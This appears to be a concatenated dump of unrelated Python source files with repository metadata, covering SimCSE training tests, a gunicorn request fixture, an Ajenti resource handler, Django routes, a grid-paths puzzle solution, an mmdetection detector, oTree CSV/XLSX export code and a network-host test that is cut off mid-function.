def test_unsup_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='unsup')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = UnsupSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_unsup.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-unsup', monitor='loss', save_weights_only=False)
])
def test_supervised_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='sup')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = SupervisedSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_supervised.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-sup', monitor='loss', save_weights_only=False)
])
def test_hardneg_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='hardneg')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = HardNegativeSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_hardnegative.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-hardneg', monitor='loss', save_weights_only=False)
])
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
ceec8895dd948248f90dc1ce9b661b06dda07910 | 3a891a79be468621aae43defd9a5516f9763f36e | /desktop/core/ext-py/gunicorn-19.9.0/tests/requests/valid/008.py | 379f9a2b8225da64fc0ce89d9df7284ea38de7a1 | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"HPND",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | oyorooms/hue | b53eb87f805063a90f957fd2e1733f21406269aa | 4082346ef8d5e6a8365b05752be41186840dc868 | refs/heads/master | 2020-04-15T20:31:56.931218 | 2019-01-09T19:02:21 | 2019-01-09T19:05:36 | 164,998,117 | 4 | 2 | Apache-2.0 | 2019-01-10T05:47:36 | 2019-01-10T05:47:36 | null | UTF-8 | Python | false | false | 178 | py | request = {
"method": "GET",
"uri": uri("/unusual_content_length"),
"version": (1, 0),
"headers": [
("CONTENT-LENGTH", "5")
],
"body": b"HELLO"
}
| [
"[email protected]"
] | |
e01c46b464ea5acc72f34996eb8499aa6de81940 | c5101b884745487b73356b5810845b7ef74dc6b8 | /coding_challenge_restful/constants/common_constants.py | 3e542bc6ad1f6983b8ae293df7ed1ef28b5ccdd8 | [] | no_license | impiyush83/import-large-dataset-file-to-db | ae9f03d7f66ec62c1eb28be6c8297bb6b16639aa | 8cc4cba5cb13044d6db982b156dc50a4feef25a0 | refs/heads/master | 2022-12-11T20:28:48.069489 | 2019-06-20T07:44:41 | 2019-06-20T07:44:41 | 192,121,003 | 1 | 0 | null | 2022-12-08T05:15:58 | 2019-06-15T20:25:54 | Python | UTF-8 | Python | false | false | 93 | py | SUCCESS = "SUCCESS"
CSV_HEADERS = dict(
BulkCSVProducts=['name', 'sku', 'description']
)
| [
"[email protected]"
] | |
fc8410ca410351cbe027cc1f9b8543bdce3b987c | 5653001ec8ec0bdcc8b9662f1411002cd52cb38d | /plugins/core/views/resource_server.py | 732518e90b2b480e52c388850064fd9978c251fe | [] | no_license | laravelbook/ajenti | 409da009d8e4ff5c497627c2f131c56f3298b5ce | 7cb64b36e3057cffc6ad58b189dc118a21c9d69d | refs/heads/master | 2021-01-21T00:47:50.194075 | 2015-09-08T09:44:56 | 2015-09-08T09:45:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,134 | py | import json
import os
from jadi import component
import aj
from aj.api.http import url, HttpPlugin
from aj.plugins import PluginManager
from aj.api.endpoint import endpoint
@component(HttpPlugin)
class ResourcesHandler(HttpPlugin):
def __init__(self, http_context):
self.cache = {}
self.use_cache = not aj.debug
self.mgr = PluginManager.get(aj.context)
@url(r'/resources/all\.(?P<type>.+)')
@endpoint(page=True, auth=False)
def handle_build(self, http_context, type=None):
if self.use_cache and type in self.cache:
content = self.cache[type]
else:
content = ''
if type in ['js', 'css']:
for plugin in self.mgr:
path = self.mgr.get_content_path(plugin, 'resources/build/all.%s' % type)
if os.path.exists(path):
content += open(path).read()
if type == 'init.js':
ng_modules = []
for plugin in self.mgr:
for resource in self.mgr[plugin]['info']['resources']:
if resource.startswith('ng:'):
ng_modules.append(resource.split(':')[-1])
content = '''
window.__ngModules = %s;
''' % json.dumps(ng_modules)
if type == 'partials.js':
content = '''
angular.module("core.templates", []);
angular.module("core.templates").run(
["$templateCache", function($templateCache) {
'''
for plugin in self.mgr:
for resource in self.mgr[plugin]['info']['resources']:
if resource.endswith('.html'):
path = self.mgr.get_content_path(plugin, resource)
if os.path.exists(path):
template = open(path).read()
content += '''
$templateCache.put("%s", %s);
''' % (
'%s/%s:%s' % (http_context.prefix, plugin, resource),
json.dumps(template)
)
content += '''
}]);
'''
self.cache[type] = content
http_context.add_header('Content-Type', {
'css': 'text/css',
'js': 'application/javascript; charset=utf-8',
'init.js': 'application/javascript; charset=utf-8',
'partials.js': 'application/javascript; charset=utf-8',
}[type])
http_context.respond_ok()
return http_context.gzip(content=content)
@url(r'/resources/(?P<plugin>\w+)/(?P<path>.+)')
@endpoint(page=True, auth=False)
def handle_file(self, http_context, plugin=None, path=None):
if '..' in path:
return http_context.respond_not_found()
return http_context.file(PluginManager.get(aj.context).get_content_path(plugin, path))
| [
"[email protected]"
] | |
44375c66e34b3f92833d4072fa8cc571efb27d5b | 163872dee6c98ab2d4f9f592509050fda2e1abc6 | /myapp_1/urls.py | 2d7b659af0d5a416f915a80c5a73296ffccccec7 | [] | no_license | aynulislam/Django-Rest-Framework | b89b3cab93254aefa7b53c85ba384f911b2516e0 | 6f9e1cffc651b4e809aa6fbfff0e12a66cdbb989 | refs/heads/master | 2020-08-15T07:24:15.812020 | 2019-10-16T09:09:00 | 2019-10-16T09:09:00 | 215,300,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | from django.urls import path
from . views import EmCategoryAPIView,EmEmailAPIView,EmReceiverAPIView,EmGroupAPIView,EmUserAPIView,ScUserAPIView,GnGroupTypeAPIView
urlpatterns = [
path('EmCategory/', EmCategoryAPIView, name="EmCategoryAPIView"),
path('EmEmail/', EmEmailAPIView, name="EmEmailAPIView"),
path('EmReceiver/', EmReceiverAPIView, name="EmReceiverAPIView"),
path('EmGroup/', EmGroupAPIView, name="EmGroupAPIView"),
path('EmUser/', EmUserAPIView, name="EmUserAPIView"),
path('ScUser/', ScUserAPIView, name="ScUserAPIView"),
path('GnGroup/', GnGroupTypeAPIView, name="GnGroupTypeAPIView"),
]
| [
"[email protected]"
] | |
468b66b2fef16af97cf3104bbb05e66e47e4bff1 | f9e8733ed87858b12bfee6b70ccdddd6a616b60a | /62.py | 799f209d8c36c80090880a57df0cc0ad6e89c666 | [] | no_license | MajestyLee/leetcode_TopInterview | c1c9c923d3bf42cd4777bb2a2ccd21654a7c6dbb | 30b7d5acec716b7d754141835fc8bafe4411437e | refs/heads/master | 2020-04-01T12:19:20.837383 | 2018-11-06T02:13:44 | 2018-11-06T02:13:44 | 153,200,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | '''
A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
The robot can only move either down or right at any point in time.
The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
How many possible unique paths are there?
Above is a 7 x 3 grid. How many possible unique paths are there?
Note: m and n will be at most 100.
Example 1:
Input: m = 3, n = 2
Output: 3
Explanation:
From the top-left corner, there are a total of 3 ways to reach the bottom-right corner:
1. Right -> Right -> Down
2. Right -> Down -> Right
3. Down -> Right -> Right
Example 2:
Input: m = 7, n = 3
Output: 28
'''
#DP
import math
class Solution:
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
"""
dp = [[1 for j in range(0,m)] for i in range(0,n)]
for i in range(1,n):
for j in range(1,m):
dp[i][j] = dp[i-1][j] + dp[i][j-1]
return dp[-1][-1]
#dfs
def dfsUniquePaths(self,m,n):
if m==1 or n == 1:
return 1
else:
            return self.dfsUniquePaths(m - 1, n) + self.dfsUniquePaths(m, n - 1)
#math
def mathUniquePaths(self, m, n):
        # integer division keeps the binomial coefficient exact for large m, n
        return math.factorial(m+n-2)//math.factorial(m-1)//math.factorial(n-1)
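    # Cross-check (added): all three methods agree on the samples in the problem
    # statement, e.g. uniquePaths(7, 3) == 28, matching C(7+3-2, 3-1) = C(8, 2) = 28.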
| [
"[email protected]"
] | |
d1509126fa63efd3f64b1929998f2ca8f07320df | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/detection/NasFPN/mmdet/models/detectors/trident_faster_rcnn.py | f0fd80d41407162df71ba5349fc659d4713cdb6e | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 2,662 | py | from ..builder import DETECTORS
from .faster_rcnn import FasterRCNN
@DETECTORS.register_module()
class TridentFasterRCNN(FasterRCNN):
"""Implementation of `TridentNet <https://arxiv.org/abs/1901.01892>`_"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(TridentFasterRCNN, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
assert self.backbone.num_branch == self.roi_head.num_branch
assert self.backbone.test_branch_idx == self.roi_head.test_branch_idx
self.num_branch = self.backbone.num_branch
self.test_branch_idx = self.backbone.test_branch_idx
    def simple_test(self, img, img_metas, proposals=None, rescale=False):
        """Test without augmentation."""
        assert self.with_bbox, 'Bbox head must be implemented.'
        x = self.extract_feat(img)
        # Build the multi-branch image metas up front so they are defined even
        # when precomputed proposals are supplied.
        num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
        trident_img_metas = img_metas * num_branch
        if proposals is None:
            proposal_list = self.rpn_head.simple_test_rpn(x, trident_img_metas)
        else:
            proposal_list = proposals
        return self.roi_head.simple_test(
            x, proposal_list, trident_img_metas, rescale=rescale)
def aug_test(self, imgs, img_metas, rescale=False):
"""Test with augmentations.
If rescale is False, then returned bboxes and masks will fit the scale
of imgs[0].
"""
x = self.extract_feats(imgs)
num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
trident_img_metas = [img_metas * num_branch for img_metas in img_metas]
proposal_list = self.rpn_head.aug_test_rpn(x, trident_img_metas)
return self.roi_head.aug_test(
x, proposal_list, img_metas, rescale=rescale)
def forward_train(self, img, img_metas, gt_bboxes, gt_labels, **kwargs):
"""make copies of img and gts to fit multi-branch."""
trident_gt_bboxes = tuple(gt_bboxes * self.num_branch)
trident_gt_labels = tuple(gt_labels * self.num_branch)
trident_img_metas = tuple(img_metas * self.num_branch)
return super(TridentFasterRCNN,
self).forward_train(img, trident_img_metas,
trident_gt_bboxes, trident_gt_labels)
| [
"[email protected]"
] | |
894b209cab8c7b9927d6ddd95fe0b0e53161b536 | 1745b353ca80b37d649197bb8fd8025429f01819 | /otree/export.py | 2674004d4cd14b66dae2d96ebca4ae0cf8e47af3 | [
"MIT"
] | permissive | MetaCell/otree-core | 9cd0041f1aa2023a4039e2f091faafa0208d7e58 | 638af2f8fc434700373366b2bb9018f2c2f41840 | refs/heads/master | 2021-01-12T14:06:31.253436 | 2016-09-26T10:43:02 | 2016-09-26T10:43:02 | 69,562,622 | 0 | 0 | null | 2018-04-24T10:07:08 | 2016-09-29T11:50:19 | Python | UTF-8 | Python | false | false | 19,090 | py | from __future__ import absolute_import
from otree.common import Currency
from django.db.models import BinaryField
import sys
import datetime
import inspect
import otree
import collections
import six
from django.utils.encoding import force_text
from collections import OrderedDict
from django.conf import settings
from django.db.models import Max, Count, Sum
from decimal import Decimal
import otree.constants_internal
from otree.models.participant import Participant
from otree.models.session import Session
from otree.models.subsession import BaseSubsession
from otree.models.group import BaseGroup
from otree.models.player import BasePlayer
from otree.models_concrete import (
PageCompletion)
from otree.common_internal import get_models_module, app_name_format
if sys.version_info[0] == 2:
import unicodecsv as csv
else:
import csv
def inspect_field_names(Model):
# filter out BinaryField, because it's not useful for CSV export or
# live results. could be very big, and causes problems with utf-8 export
# I tried .get_fields() instead of .fields, but that method returns
# fields that cause problems, like saying group has an attribute 'player'
return [f.name for f in Model._meta.fields
if not isinstance(f, BinaryField)]
def get_field_names_for_live_update(Model):
return _get_table_fields(Model, for_export=False)
def get_field_names_for_csv(Model):
return _get_table_fields(Model, for_export=True)
def _get_table_fields(Model, for_export=False):
if Model is Session:
# only data export
return [
'code',
'label',
'experimenter_name',
# not a field
#'real_world_currency_per_point',
'time_scheduled',
'time_started',
'mturk_HITId',
'mturk_HITGroupId',
# not a field
#'participation_fee',
'comment',
'is_demo',
]
if Model is Participant:
if for_export:
return [
'id_in_session',
'code',
'label',
'_is_bot',
'_index_in_pages',
'_max_page_index',
'_current_app_name',
'_round_number',
'_current_page_name',
'ip_address',
'time_started',
'exclude_from_data_analysis',
'visited',
'mturk_worker_id',
'mturk_assignment_id',
]
else:
return [
'_id_in_session',
'code',
'label',
'_current_page',
'_current_app_name',
'_round_number',
'_current_page_name',
'status',
'_last_page_timestamp',
]
if issubclass(Model, BasePlayer):
subclass_fields = [
f for f in inspect_field_names(Model)
if f not in inspect_field_names(BasePlayer)
and f not in ['id', 'group', 'subsession']
]
if for_export:
return ['id_in_group'] + subclass_fields + ['payoff']
else:
return ['id_in_group', 'role'] + subclass_fields + ['payoff']
if issubclass(Model, BaseGroup):
subclass_fields = [
f for f in inspect_field_names(Model)
if f not in inspect_field_names(BaseGroup)
and f not in ['id', 'subsession']
]
return ['id_in_subsession'] + subclass_fields
if issubclass(Model, BaseSubsession):
subclass_fields = [
f for f in inspect_field_names(Model)
if f not in inspect_field_names(BaseGroup)
and f != 'id'
]
return ['round_number'] + subclass_fields
def sanitize_for_csv(value):
if value is None:
return ''
if value is True:
return '1'
if value is False:
return '0'
value = force_text(value)
return value.replace('\n', ' ').replace('\r', ' ')
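# Examples (added for clarity): sanitize_for_csv(None) -> '', sanitize_for_csv(True) -> '1',
# sanitize_for_csv(False) -> '0', sanitize_for_csv('a\nb') -> 'a b'.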
def sanitize_for_live_update(value):
if value is None:
return ''
if value is True:
return 1
if value is False:
return 0
return value
def get_rows_for_wide_csv():
sessions = Session.objects.order_by('id').annotate(
num_participants=Count('participant')).values()
session_cache = {row['id']: row for row in sessions}
participants = Participant.objects.order_by('id').values()
payoff_cache = get_payoff_cache()
payoff_plus_participation_fee_cache = get_payoff_plus_participation_fee_cache(payoff_cache)
session_fields = get_field_names_for_csv(Session)
participant_fields = get_field_names_for_csv(Participant)
participant_fields += ['payoff', 'payoff_plus_participation_fee']
header_row = ['participant.{}'.format(fname) for fname in participant_fields]
header_row += ['session.{}'.format(fname) for fname in session_fields]
rows = [header_row]
for participant in participants:
participant['payoff'] = payoff_cache[participant['id']]
participant['payoff_plus_participation_fee'] = payoff_plus_participation_fee_cache[participant['id']]
row = [sanitize_for_csv(participant[fname]) for fname in participant_fields]
session = session_cache[participant['session_id']]
row += [sanitize_for_csv(session[fname]) for fname in session_fields]
rows.append(row)
# heuristic to get the most relevant order of apps
import json
app_sequences = collections.Counter()
for session in sessions:
config = json.loads(session['config'])
app_sequence = config['app_sequence']
app_sequences[tuple(app_sequence)] += session['num_participants']
most_common_app_sequence = app_sequences.most_common(1)[0][0]
apps_not_in_popular_sequence = [
app for app in settings.INSTALLED_OTREE_APPS
if app not in most_common_app_sequence]
order_of_apps = list(most_common_app_sequence) + apps_not_in_popular_sequence
rounds_per_app = OrderedDict()
for app_name in order_of_apps:
models_module = get_models_module(app_name)
agg_dict = models_module.Subsession.objects.all().aggregate(Max('round_number'))
highest_round_number = agg_dict['round_number__max']
if highest_round_number is not None:
rounds_per_app[app_name] = highest_round_number
for app_name in rounds_per_app:
for round_number in range(1, rounds_per_app[app_name] + 1):
new_rows = get_rows_for_wide_csv_round(app_name, round_number, sessions)
for i in range(len(rows)):
rows[i].extend(new_rows[i])
return rows
def get_rows_for_wide_csv_round(app_name, round_number, sessions):
models_module = otree.common_internal.get_models_module(app_name)
Player = models_module.Player
Group = models_module.Group
Subsession = models_module.Subsession
rows = []
group_cache = {row['id']: row for row in Group.objects.values()}
columns_for_models = {
Model.__name__.lower(): get_field_names_for_csv(Model)
for Model in [Player, Group, Subsession]
}
model_order = ['player', 'group', 'subsession']
header_row = []
for model_name in model_order:
for colname in columns_for_models[model_name]:
header_row.append('{}.{}.{}.{}'.format(
app_name, round_number, model_name, colname))
rows.append(header_row)
empty_row = ['' for _ in range(len(header_row))]
for session in sessions:
subsession = Subsession.objects.filter(
session_id=session['id'], round_number=round_number).values()
if not subsession:
subsession_rows = [empty_row for _ in range(session['num_participants'])]
else:
subsession = subsession[0]
subsession_id = subsession['id']
players = Player.objects.filter(subsession_id=subsession_id).order_by('id').values()
subsession_rows = []
for player in players:
row = []
all_objects = {
'player': player,
'group': group_cache[player['group_id']],
'subsession': subsession}
for model_name in model_order:
for colname in columns_for_models[model_name]:
value = all_objects[model_name][colname]
row.append(sanitize_for_csv(value))
subsession_rows.append(row)
rows.extend(subsession_rows)
return rows
def get_rows_for_csv(app_name):
models_module = otree.common_internal.get_models_module(app_name)
Player = models_module.Player
Group = models_module.Group
Subsession = models_module.Subsession
columns_for_models = {
Model.__name__.lower(): get_field_names_for_csv(Model)
for Model in [Player, Group, Subsession, Participant, Session]
}
participant_ids = Player.objects.values_list('participant_id', flat=True)
session_ids = Subsession.objects.values_list('session_id', flat=True)
players = Player.objects.order_by('id').values()
value_dicts = {
'group': {row['id']: row for row in Group.objects.values()},
'subsession': {row['id']: row for row in Subsession.objects.values()},
'participant': {row['id']: row for row in
Participant.objects.filter(
id__in=participant_ids).values()},
'session': {row['id']: row for row in
Session.objects.filter(id__in=session_ids).values()}
}
model_order = ['participant', 'player', 'group', 'subsession', 'session']
# header row
rows = [['{}.{}'.format(model_name, colname)
for model_name in model_order
for colname in columns_for_models[model_name]]]
for player in players:
row = []
all_objects = {'player': player}
for model_name in value_dicts:
obj_id = player['{}_id'.format(model_name)]
all_objects[model_name] = value_dicts[model_name][obj_id]
for model_name in model_order:
for colname in columns_for_models[model_name]:
value = all_objects[model_name][colname]
row.append(sanitize_for_csv(value))
rows.append(row)
return rows
def get_rows_for_live_update(app_name, subsession_pk):
models_module = otree.common_internal.get_models_module(app_name)
Player = models_module.Player
Group = models_module.Group
Subsession = models_module.Subsession
columns_for_models = {
Model.__name__.lower(): get_field_names_for_live_update(Model)
for Model in [Player, Group, Subsession]
}
# we had a strange result on one person's heroku instance
    # where Meta.ordering on the Player was being ignored
# when you use a filter. So we add one explicitly.
players = Player.objects.filter(
subsession_id=subsession_pk).select_related(
'group', 'subsession').order_by('pk')
model_order = ['player', 'group', 'subsession']
rows = []
for player in players:
row = []
for model_name in model_order:
if model_name == 'player':
model_instance = player
else:
model_instance = getattr(player, model_name)
for colname in columns_for_models[model_name]:
attr = getattr(model_instance, colname, '')
if isinstance(attr, collections.Callable):
if model_name == 'player' and colname == 'role' \
and model_instance.group is None:
attr = ''
else:
try:
attr = attr()
except:
attr = "(error)"
row.append(sanitize_for_live_update(attr))
rows.append(row)
return columns_for_models, rows
def export_wide(fp, file_extension='csv'):
rows = get_rows_for_wide_csv()
if file_extension == 'xlsx':
_export_xlsx(fp, rows)
else:
_export_csv(fp, rows)
def export_app(app_name, fp, file_extension='csv'):
rows = get_rows_for_csv(app_name)
if file_extension == 'xlsx':
_export_xlsx(fp, rows)
else:
_export_csv(fp, rows)
def _export_csv(fp, rows):
writer = csv.writer(fp)
writer.writerows(rows)
def _export_xlsx(fp, rows):
'''
CSV often does not open properly in Excel, e.g. unicode
'''
import xlsxwriter
workbook = xlsxwriter.Workbook(fp, {'in_memory': True})
worksheet = workbook.add_worksheet()
for row_num, row in enumerate(rows):
for col_num, cell_value in enumerate(row):
worksheet.write(row_num, col_num, cell_value)
workbook.close()
def export_time_spent(fp):
    """Write the time spent on each page as csv into the file-like object.
    """
column_names = [
'session_id',
'participant__id_in_session',
'participant__code',
'page_index',
'app_name',
'page_name',
'time_stamp',
'seconds_on_page',
'subsession_pk',
'auto_submitted',
]
rows = PageCompletion.objects.order_by(
'session', 'participant', 'page_index'
).values_list(*column_names)
writer = csv.writer(fp)
writer.writerows([column_names])
writer.writerows(rows)
def export_docs(fp, app_name):
    """Write the docs of the given app name as text into the file-like object
    """
    # generate doc_dict
models_module = get_models_module(app_name)
model_names = ["Participant", "Player", "Group", "Subsession", "Session"]
line_break = '\r\n'
def choices_readable(choices):
lines = []
for value, name in choices:
# unicode() call is for lazy translation strings
lines.append(u'{}: {}'.format(value, six.text_type(name)))
return lines
def generate_doc_dict():
doc_dict = OrderedDict()
data_types_readable = {
'PositiveIntegerField': 'positive integer',
'IntegerField': 'integer',
'BooleanField': 'boolean',
'CharField': 'text',
'TextField': 'text',
'FloatField': 'decimal',
'DecimalField': 'decimal',
'CurrencyField': 'currency'}
for model_name in model_names:
if model_name == 'Participant':
Model = Participant
elif model_name == 'Session':
Model = Session
else:
Model = getattr(models_module, model_name)
field_names = set(field.name for field in Model._meta.fields)
members = get_field_names_for_csv(Model)
doc_dict[model_name] = OrderedDict()
for member_name in members:
member = getattr(Model, member_name, None)
doc_dict[model_name][member_name] = OrderedDict()
if member_name == 'id':
doc_dict[model_name][member_name]['type'] = [
'positive integer']
doc_dict[model_name][member_name]['doc'] = ['Unique ID']
elif member_name in field_names:
member = Model._meta.get_field_by_name(member_name)[0]
internal_type = member.get_internal_type()
data_type = data_types_readable.get(
internal_type, internal_type)
doc_dict[model_name][member_name]['type'] = [data_type]
# flag error if the model doesn't have a doc attribute,
# which it should unless the field is a 3rd party field
doc = getattr(member, 'doc', '[error]') or ''
doc_dict[model_name][member_name]['doc'] = [
line.strip() for line in doc.splitlines()
if line.strip()]
choices = getattr(member, 'choices', None)
if choices:
doc_dict[model_name][member_name]['choices'] = (
choices_readable(choices))
elif isinstance(member, collections.Callable):
doc_dict[model_name][member_name]['doc'] = [
inspect.getdoc(member)]
return doc_dict
def docs_as_string(doc_dict):
first_line = '{}: Documentation'.format(app_name_format(app_name))
second_line = '*' * len(first_line)
lines = [
first_line, second_line, '',
'Accessed: {}'.format(datetime.date.today().isoformat()), '']
app_doc = getattr(models_module, 'doc', '')
if app_doc:
lines += [app_doc, '']
for model_name in doc_dict:
lines.append(model_name)
for member in doc_dict[model_name]:
lines.append('\t{}'.format(member))
for info_type in doc_dict[model_name][member]:
lines.append('\t\t{}'.format(info_type))
for info_line in doc_dict[model_name][member][info_type]:
lines.append(u'{}{}'.format('\t' * 3, info_line))
output = u'\n'.join(lines)
return output.replace('\n', line_break).replace('\t', ' ')
doc_dict = generate_doc_dict()
doc = docs_as_string(doc_dict)
fp.write(doc)
def get_payoff_cache():
payoff_cache = collections.defaultdict(Decimal)
for app_name in settings.INSTALLED_OTREE_APPS:
models_module = get_models_module(app_name)
Player = models_module.Player
for d in Player.objects.values(
'participant_id', 'session_id').annotate(Sum('payoff')):
payoff_cache[d['participant_id']] += (d['payoff__sum'] or 0)
return payoff_cache
def get_payoff_plus_participation_fee_cache(payoff_cache):
# don't want to modify the input
payoff_cache = payoff_cache.copy()
for p_id in payoff_cache:
# convert to Currency so we can call to_real_world_currency
payoff_cache[p_id] = Currency(payoff_cache[p_id])
participant_ids_to_session_ids = {
p['id']: p['session_id'] for p in Participant.objects.values(
'id', 'session_id')
}
sessions_cache = {s.id: s for s in Session.objects.all()}
payoff_plus_participation_fee_cache = collections.defaultdict(Decimal)
for p_id in payoff_cache:
session_id = participant_ids_to_session_ids[p_id]
session = sessions_cache[session_id]
payoff = payoff_cache[p_id]
payoff_plus_participation_fee = session._get_payoff_plus_participation_fee(payoff)
payoff_plus_participation_fee_cache[p_id] = payoff_plus_participation_fee.to_number()
return payoff_plus_participation_fee_cache
| [
"[email protected]"
] | |
f82e5bb5a7ab5e8c5feeaf09b0b27b2a68ca3543 | c361a25acecd016677bbd0c6d9fc56de79cf03ed | /PTM/tests/NetworkHostTest.py | 24465c10617c8bc706896eaea73a686ec4fea431 | [] | no_license | danielmellado/zephyr | f8931633045959e7e9a974de8b700a287a1ae94e | dc6f85b78b50e599504966154b927fe198d7402d | refs/heads/master | 2021-01-12T22:31:24.479814 | 2015-10-14T05:39:04 | 2015-10-14T06:24:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,468 | py | __author__ = 'micucci'
import unittest
import json
import time
import os
from common.CLI import LinuxCLI
from PTM.ComputeHost import ComputeHost
from PTM.CassandraHost import CassandraHost
from PTM.ZookeeperHost import ZookeeperHost
from PTM.NetworkHost import NetworkHost
from PTM.RootHost import RootHost
from PTM.PhysicalTopologyManager import PhysicalTopologyManager, HOST_CONTROL_CMD_NAME
from PTM.PhysicalTopologyConfig import *
from common.LogManager import LogManager
import CBT.VersionConfig as version_config
class NetworkHostTest(unittest.TestCase):
def test_startup(self):
lm = LogManager('./test-logs')
ptm = PhysicalTopologyManager(root_dir=os.path.dirname(os.path.abspath(__file__)) + '/../..', log_manager=lm)
root_cfg = HostDef('root',
bridges={'br0': BridgeDef('br0', ip_addresses=[IP('10.0.0.240')])},
interfaces={'zoo1eth0': InterfaceDef('zoo1eth0', linked_bridge='br0'),
#'cass1eth0': InterfaceDef('cass1eth0', linked_bridge='br0'),
'cmp1eth0': InterfaceDef('cmp1eth0', linked_bridge='br0')})
zoo1_cfg = HostDef('zoo1',
interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.2')])})
#cass1_cfg = HostDef('cass1',
# interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.5')])})
cmp1_cfg = HostDef('cmp1',
interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.8')])})
net_cfg = HostDef('net')
zoo1_icfg= ImplementationDef('zoo1', 'PTM.ZookeeperHost', id='1',
zookeeper_ips=['10.0.0.2'])
#cass1_icfg= ImplementationDef('cass1', 'PTM.CassandraHost', id='1',
# cassandra_ips=['10.0.0.5'],
# init_token="56713727820156410577229101238628035242")
cmp1_icfg= ImplementationDef('cmp1', 'PTM.ComputeHost', id='1',
zookeeper_ips=['10.0.0.2'],
cassandra_ips=[])#['10.0.0.5'])
root_icfg = ImplementationDef('cmp1', 'PTM.RootHost')
net_icfg = ImplementationDef('cmp1', 'PTM.NetworkHost',
zookeeper_ips=['10.0.0.2'])
root = RootHost('root', ptm)
zoo1 = ZookeeperHost(zoo1_cfg.name, ptm)
#cass1 = CassandraHost(cass1_cfg.name, ptm)
cmp1 = ComputeHost(cmp1_cfg.name, ptm)
net = NetworkHost(net_cfg.name, ptm)
log = lm.add_file_logger('test.log', 'test')
root.set_logger(log)
zoo1.set_logger(log)
#cass1.set_logger(log)
cmp1.set_logger(log)
net.set_logger(log)
# Now configure the host with the definition and impl configs
root.config_from_ptc_def(root_cfg, root_icfg)
zoo1.config_from_ptc_def(zoo1_cfg, zoo1_icfg)
#cass1.config_from_ptc_def(cass1_cfg, cass1_icfg)
cmp1.config_from_ptc_def(cmp1_cfg, cmp1_icfg)
net.config_from_ptc_def(net_cfg, net_icfg)
root.link_interface(root.interfaces['zoo1eth0'], zoo1, zoo1.interfaces['eth0'])
#root.link_interface(root.interfaces['cass1eth0'], cass1, cass1.interfaces['eth0'])
root.link_interface(root.interfaces['cmp1eth0'], cmp1, cmp1.interfaces['eth0'])
ptm.hosts_by_name['root'] = root
ptm.hosts_by_name['zoo1'] = zoo1
#ptm.hosts_by_name['cass1'] = cass1
ptm.hosts_by_name['cmp1'] = cmp1
ptm.hosts_by_name['net'] = net
ptm.host_by_start_order.append(root)
ptm.host_by_start_order.append(zoo1)
#ptm.host_by_start_order.append(cass1)
ptm.host_by_start_order.append(cmp1)
ptm.host_by_start_order.append(net)
for h in ptm.host_by_start_order:
h.create()
for h in ptm.host_by_start_order:
h.boot()
for h in ptm.host_by_start_order:
h.net_up()
for h in ptm.host_by_start_order:
h.net_finalize()
for h in ptm.host_by_start_order:
h.prepare_config()
for h in ptm.host_by_start_order:
start_process = ptm.unshare_control('start', h)
stdout, stderr = start_process.communicate()
start_process.poll()
print("Host control process output: ")
print stdout
print("Host control process error output: ")
print stderr
if start_process.returncode != 0:
raise SubprocessFailedException('Host control start failed with: ' + str(start_process.returncode))
try:
